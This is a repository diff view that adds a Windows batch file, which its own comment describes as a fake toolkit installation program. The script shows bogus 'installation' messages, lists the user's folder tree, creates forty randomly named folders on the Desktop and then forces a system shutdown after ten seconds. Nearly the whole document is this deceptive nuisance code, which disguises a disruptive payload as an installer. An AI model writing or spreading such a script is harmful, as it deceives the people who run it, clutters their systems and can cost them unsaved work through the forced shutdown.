diff options
Diffstat (limited to 'ShitStain/Sequel')
-rw-r--r-- | ShitStain/Sequel/ShitStain_The_Sequel.bat | 14 |
1 files changed, 14 insertions, 0 deletions
diff --git a/ShitStain/Sequel/ShitStain_The_Sequel.bat b/ShitStain/Sequel/ShitStain_The_Sequel.bat new file mode 100644 index 0000000..c852830 --- /dev/null +++ b/ShitStain/Sequel/ShitStain_The_Sequel.bat @@ -0,0 +1,14 @@ +::fake toolkit instalation progrm that makes a ton of files in Desktop and shutsdown after that
+@echo off
+title Toolkit installation
+msg * Toolkit installation is starting
+cd /d %systemdrive%\Users\%username%\
+tree
+cd /d %systemdrive%\Users\%username%\Desktop
+setlocal EnableDelayedExpansion
+ for /l %%x in (1,1,40) do (
+ mkdir !random!
+ )
+endlocal
+msg * The toolkit installation is nearly complete please wait ...
+shutdown /s /t 10
\ No newline at end of file |